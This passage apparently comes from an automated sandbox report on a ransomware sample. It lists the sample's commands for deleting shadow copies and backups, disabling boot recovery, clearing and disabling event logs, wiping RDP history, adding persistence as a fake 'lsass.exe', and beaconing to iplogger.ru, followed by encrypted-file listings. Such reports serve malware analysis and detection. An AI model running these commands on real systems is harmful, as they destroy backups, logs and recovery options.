  616.  
  617.  
  618. "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
  619.  
  620.  
  621. "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
  622.  
  623.  
  624. "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
  625.  
  626.  
  627. "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
  628.  
  629.  
  630. "command": "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
  631.  
  632.  
  633. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
  634.  
  635.  
  636. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
  637.  
  638.  
  639. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
  640.  
  641.  
  642. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
  643.  
  644.  
  645. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
  646.  
  647.  
  648. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
  649.  
  650.  
  651. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
  652.  
  653.  
  654. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
  655.  
  656.  
  657. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
  658.  
  659.  
  660. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
  661.  
  662.  
  663. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
  664.  
  665.  
  666. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
  667.  
  668.  
  669. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
  670.  
  671.  
  672. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
  673.  
  674.  
  675. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
  676.  
  677.  
  678. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
  679.  
  680.  
  681. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
  682.  
  683.  
  684. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
  685.  
  686.  
  687. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
  688.  
  689.  
  690. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
  691.  
  692.  
  693. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
  694.  
  695.  
  696. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
  697.  
  698.  
  699. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
  700.  
  701.  
  702. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
  703.  
  704.  
  705. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
  706.  
  707.  
  708. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
  709.  
  710.  
  711. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
  712.  
  713.  
  714. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
  715.  
  716.  
  717. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
  718.  
  719.  
  720. "command": "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1"
  721.  
  722.  
  723. "command": "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete"
  724.  
  725.  
  726. "command": "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete"
  727.  
  728.  
  729. "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
  730.  
  731.  
  732. "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
  733.  
  734.  
  735. "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
  736.  
  737.  
  738. "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
  739.  
  740.  
  741. "command": "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
  742.  
  743.  
  744. "command": "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
  745.  
  746.  
  747. "command": "attrib \"C:\\Users\\user\\documents\\Default.rdp\" -s -h"
  748.  
  749.  
  750. "command": "sc config eventlog start=disabled"
  751.  
  752.  
  753. "command": "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\""
  754.  
  755.  
  756.  
  757.  
  758. "Description": "Attempts to delete volume shadow copies",
  759. "Details":
  760.  
  761.  
  762. "Description": "Deletes its original binary from disk",
  763. "Details":
  764.  
  765.  
  766. "Description": "Modifies boot configuration settings",
  767. "Details":
  768.  
  769. "disables_system_recovery": "Modifies the boot configuration to disable startup recovery"
  770.  
  771.  
  772. "ignorefailures": "Modifies the boot configuration to disable Windows error recovery"
  773.  
  774.  
  775.  
  776.  
  777. "Description": "A system process is generating network traffic likely as a result of process injection",
  778. "Details":
  779.  
  780. "http_request": "lsass.exe_InternetConnectA_iplogger.ru"
  781.  
  782.  
  783. "http_request_path": "lsass.exe_HttpOpenRequestA_1Oh8E.jpeg"
  784.  
  785.  
  786.  
  787.  
  788. "Description": "Installs itself for autorun at Windows startup",
  789. "Details":
  790.  
  791. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Local Security Authority Subsystem Service"
  792.  
  793.  
  794. "data": "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -start"
  795.  
  796.  
  797.  
  798.  
  799. "Description": "Exhibits possible ransomware file modification behavior",
  800. "Details":
  801.  
  802. "file_modifications": "Performs 146 file moves indicative of a potential file encryption process"
  803.  
  804.  
  805. "drops_unknown_mimetypes": "Drops 159 unknown file mime types which may be indicative of encrypted files being written back to disk"
  806.  
  807.  
  808.  
  809.  
  810. "Description": "Writes a potential ransom message to disk",
  811. "Details":
  812.  
  813. "ransom_file": "!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT"
  814.  
  815.  
  816.  
  817.  
  818. "Description": "Stack pivoting was detected when using a critical API",
  819. "Details":
  820.  
  821. "process": "taskeng.exe:2584"
  822.  
  823.  
  824. "process": "taskeng.exe:1604"
  825.  
  826.  
  827.  
  828.  
  829. "Description": "File has been identified by 15 Antiviruses on VirusTotal as malicious",
  830. "Details":
  831.  
  832. "Cylance": "Unsafe"
  833.  
  834.  
  835. "CrowdStrike": "win/malicious_confidence_100% (D)"
  836.  
  837.  
  838. "Symantec": "ML.Attribute.HighConfidence"
  839.  
  840.  
  841. "APEX": "Malicious"
  842.  
  843.  
  844. "Endgame": "malicious (high confidence)"
  845.  
  846.  
  847. "Invincea": "heuristic"
  848.  
  849.  
  850. "McAfee-GW-Edition": "BehavesLike.Win32.PWSQQPass.gh"
  851.  
  852.  
  853. "FireEye": "Generic.mg.636d3c669e36510b"
  854.  
  855.  
  856. "SentinelOne": "DFI - Malicious PE"
  857.  
  858.  
  859. "Microsoft": "Trojan:Win32/Suloc.A"
  860.  
  861.  
  862. "Acronis": "suspicious"
  863.  
  864.  
  865. "VBA32": "Malware-Cryptor.General.3"
  866.  
  867.  
  868. "Rising": "Trojan.Generic@ML.100 (RDML:kwEnH7CqjV0yUM4V3OzqNQ)"
  869.  
  870.  
  871. "Cybereason": "malicious.5d1a74"
  872.  
  873.  
  874. "Qihoo-360": "HEUR/QVM19.1.F7E7.Malware.Gen"
  875.  
  876.  
  877.  
  878.  
  879. "Description": "Detects VirtualBox through the presence of a file",
  880. "Details":
  881.  
  882. "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat"
  883.  
  884.  
  885. "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf"
  886.  
  887.  
  888. "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf"
  889.  
  890.  
  891. "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat"
  892.  
  893.  
  894. "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf"
  895.  
  896.  
  897. "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat"
  898.  
  899.  
  900.  
  901.  
  902. "Description": "Clears Windows events or logs",
  903. "Details":
  904.  
  905. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
  906.  
  907.  
  908. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
  909.  
  910.  
  911. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
  912.  
  913.  
  914. "command": "wevtutil.exe clear-log Application"
  915.  
  916.  
  917. "command": "wevtutil.exe clear-log Security"
  918.  
  919.  
  920. "command": "wevtutil.exe clear-log System"
  921.  
  922.  
  923.  
  924.  
  925. "Description": "Appears to use character obfuscation in a command line",
  926. "Details":
  927.  
  928. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
  929.  
  930.  
  931.  
  932.  
  933. "Description": "Creates a copy of itself",
  934. "Details":
  935.  
  936. "copy": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe"
  937.  
  938.  
  939.  
  940.  
  941. "Description": "Drops a binary and executes it",
  942. "Details":
  943.  
  944. "binary": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe"
  945.  
  946.  
  947.  
  948.  
  949. "Description": "Anomalous binary characteristics",
  950. "Details":
  951.  
  952. "anomaly": "Found duplicated section names"
  953.  
  954.  
  955.  
  956.  
  957. "Description": "Uses suspicious command line tools or Windows utilities",
  958. "Details":
  959.  
  960. "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
  961.  
  962.  
  963. "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
  964.  
  965.  
  966. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
  967.  
  968.  
  969. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
  970.  
  971.  
  972. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
  973.  
  974.  
  975. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
  976.  
  977.  
  978. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
  979.  
  980.  
  981. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
  982.  
  983.  
  984. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
  985.  
  986.  
  987. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
  988.  
  989.  
  990. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
  991.  
  992.  
  993. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
  994.  
  995.  
  996. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
  997.  
  998.  
  999. "command": "vssadmin delete shadows /all /quiet"
  1000.  
  1001.  
  1002. "command": "wevtutil.exe clear-log Application"
  1003.  
  1004.  
  1005. "command": "wevtutil.exe clear-log Security"
  1006.  
  1007.  
  1008. "command": "wevtutil.exe clear-log System"
  1009.  
  1010.  
  1011.  
  1012.  
  1013.  
  1014. * Started Service:
  1015.  
  1016. * Mutexes:
  1017. "Global\\ADAP_WMI_ENTRY",
  1018. "Global\\RefreshRA_Mutex",
  1019. "Global\\RefreshRA_Mutex_Lib",
  1020. "Global\\RefreshRA_Mutex_Flag"
  1021.  
  1022.  
  1023. * Modified Files:
  1024. "C:\\Users\\user\\AppData\\Local\\Temp\\344AA25B.buran",
  1025. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe",
  1026. "C:\\Users\\user\\AppData\\Local\\Temp\\4500E6C1.buran",
  1027. "\\??\\PIPE\\wkssvc",
  1028. "\\Device\\LanmanDatagramReceiver",
  1029. "\\??\\PIPE\\DAV RPC SERVICE",
  1030. "C:\\Windows\\appcompat\\Programs\\RecentFileCache.bcf",
  1031. "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
  1032. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
  1033. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
  1034. "\\??\\PIPE\\samr",
  1035. "C:\\.doc",
  1036. "C:\\.doc.875B149F-7E2C-F9D8-914C-24C48737255D",
  1037. "C:\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
  1038. "C:\\.htm",
  1039. "C:\\.htm.875B149F-7E2C-F9D8-914C-24C48737255D",
  1040. "C:\\.jpeg",
  1041. "C:\\.jpeg.875B149F-7E2C-F9D8-914C-24C48737255D",
  1042. "C:\\.jpg",
  1043. "C:\\.jpg.875B149F-7E2C-F9D8-914C-24C48737255D",
  1044. "C:\\.pptx",
  1045. "C:\\.pptx.875B149F-7E2C-F9D8-914C-24C48737255D",
  1046. "C:\\.txt",
  1047. "C:\\.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
  1048. "C:\\.xls",
  1049. "C:\\.xls.875B149F-7E2C-F9D8-914C-24C48737255D",
  1050. "C:\\.zip",
  1051. "C:\\Host.bmp",
  1052. "C:\\Host.bmp.875B149F-7E2C-F9D8-914C-24C48737255D",
  1053. "C:\\Host.docx",
  1054. "C:\\Host.docx.875B149F-7E2C-F9D8-914C-24C48737255D",
  1055. "C:\\Host.html",
  1056. "C:\\Host.html.875B149F-7E2C-F9D8-914C-24C48737255D",
  1057. "C:\\Host.jpeg",
  1058. "C:\\Host.jpeg.875B149F-7E2C-F9D8-914C-24C48737255D",
  1059. "C:\\Host.jpg",
  1060. "C:\\Host.jpg.875B149F-7E2C-F9D8-914C-24C48737255D",
  1061. "C:\\Host.pdf",
  1062. "C:\\Host.pdf.875B149F-7E2C-F9D8-914C-24C48737255D",
  1063. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\iexplore.ico",
  1064. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\iexplore.ico.875B149F-7E2C-F9D8-914C-24C48737255D",
  1065. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
  1066. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\Oracle VM VirtualBox Guest Additions.url",
  1067. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\Oracle VM VirtualBox Guest Additions.url.875B149F-7E2C-F9D8-914C-24C48737255D",
  1068. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat",
  1069. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat.875B149F-7E2C-F9D8-914C-24C48737255D",
  1070. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf",
  1071. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf.875B149F-7E2C-F9D8-914C-24C48737255D",
  1072. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat",
  1073. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat.875B149F-7E2C-F9D8-914C-24C48737255D",
  1074. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf",
  1075. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf.875B149F-7E2C-F9D8-914C-24C48737255D",
  1076. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat",
  1077. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat.875B149F-7E2C-F9D8-914C-24C48737255D",
  1078. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf",
  1079. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf.875B149F-7E2C-F9D8-914C-24C48737255D",
  1080. "C:\\Program Files\\Java\\jre1.8.0_201\\COPYRIGHT",
  1081. "C:\\Program Files\\Java\\jre1.8.0_201\\COPYRIGHT.875B149F-7E2C-F9D8-914C-24C48737255D",
  1082. "C:\\Program Files\\Java\\jre1.8.0_201\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
  1083. "C:\\Program Files\\Java\\jre1.8.0_201\\LICENSE",
  1084. "C:\\Program Files\\Java\\jre1.8.0_201\\LICENSE.875B149F-7E2C-F9D8-914C-24C48737255D",
  1085. "C:\\Program Files\\Java\\jre1.8.0_201\\README.txt",
  1086. "C:\\Program Files\\Java\\jre1.8.0_201\\README.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
  1087. "C:\\Program Files\\Java\\jre1.8.0_201\\release",
  1088. "C:\\Program Files\\Java\\jre1.8.0_201\\release.875B149F-7E2C-F9D8-914C-24C48737255D",
  1089. "C:\\Program Files\\Java\\jre1.8.0_201\\THIRDPARTYLICENSEREADME-JAVAFX.txt",
  1090. "C:\\Program Files\\Java\\jre1.8.0_201\\THIRDPARTYLICENSEREADME-JAVAFX.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
  1091. "C:\\Program Files\\Java\\jre1.8.0_201\\THIRDPARTYLICENSEREADME.txt",
  1092. "C:\\Program Files\\Java\\jre1.8.0_201\\THIRDPARTYLICENSEREADME.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
  1093. "C:\\Program Files\\Java\\jre1.8.0_201\\Welcome.html",
  1094. "C:\\Program Files\\Java\\jre1.8.0_201\\Welcome.html.875B149F-7E2C-F9D8-914C-24C48737255D",
  1095. "C:\\Program Files\\Java\\jre1.8.0_201\\bin\\server\\classes.jsa",
  1096. "C:\\Program Files\\Java\\jre1.8.0_201\\bin\\server\\classes.jsa.875B149F-7E2C-F9D8-914C-24C48737255D",
  1097. "C:\\Program Files\\Java\\jre1.8.0_201\\bin\\server\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
  1098. "C:\\Program Files\\Java\\jre1.8.0_201\\bin\\server\\Xusage.txt",
  1099. "C:\\Program Files\\Java\\jre1.8.0_201\\bin\\server\\Xusage.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
  1100. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\accessibility.properties",
  1101. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\accessibility.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
  1102. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
  1103. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\calendars.properties",
  1104. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\calendars.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
  1105. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\charsets.jar",
  1106. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\charsets.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
  1107. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\classlist",
  1108. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\classlist.875B149F-7E2C-F9D8-914C-24C48737255D",
  1109. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\content-types.properties",
  1110. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\content-types.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
  1111. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\currency.data",
  1112. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\currency.data.875B149F-7E2C-F9D8-914C-24C48737255D",
  1113. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy.jar",
  1114. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
  1115. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\flavormap.properties",
  1116. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\flavormap.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
  1117. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fontconfig.bfc",
  1118. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fontconfig.bfc.875B149F-7E2C-F9D8-914C-24C48737255D",
  1119. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fontconfig.properties.src",
  1120. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fontconfig.properties.src.875B149F-7E2C-F9D8-914C-24C48737255D",
  1121. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\hijrah-config-umalqura.properties",
  1122. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\hijrah-config-umalqura.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
  1123. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\javafx.properties",
  1124. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\javafx.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
  1125. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\javaws.jar",
  1126. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\javaws.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
  1127. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jce.jar",
  1128. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jce.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
  1129. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr.jar",
  1130. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
  1131. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfxswt.jar",
  1132. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfxswt.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
  1133. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jsse.jar",
  1134. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jsse.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
  1135. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jvm.hprof.txt",
  1136. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jvm.hprof.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
  1137. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\logging.properties",
  1138. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\logging.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
  1139. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management-agent.jar",
  1140. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management-agent.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
  1141. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\meta-index",
  1142. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\meta-index.875B149F-7E2C-F9D8-914C-24C48737255D",
  1143. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\net.properties",
  1144. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\net.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
  1145. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\plugin.jar",
  1146. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\plugin.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
  1147. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\psfont.properties.ja",
  1148. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\psfont.properties.ja.875B149F-7E2C-F9D8-914C-24C48737255D",
  1149. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\psfontj2d.properties",
  1150. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\psfontj2d.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
  1151. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\resources.jar",
  1152. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\resources.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
  1153. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\rt.jar",
  1154. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\rt.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
  1155. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\sound.properties",
  1156. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\sound.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
  1157. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\tzdb.dat",
  1158. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\tzdb.dat.875B149F-7E2C-F9D8-914C-24C48737255D",
  1159. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\tzmappings",
  1160. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\tzmappings.875B149F-7E2C-F9D8-914C-24C48737255D",
  1161. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\amd64\\jvm.cfg",
  1162. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\amd64\\jvm.cfg.875B149F-7E2C-F9D8-914C-24C48737255D",
  1163. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\amd64\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
  1164. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\CIEXYZ.pf",
  1165. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\CIEXYZ.pf.875B149F-7E2C-F9D8-914C-24C48737255D",
  1166. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
  1167. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\GRAY.pf",
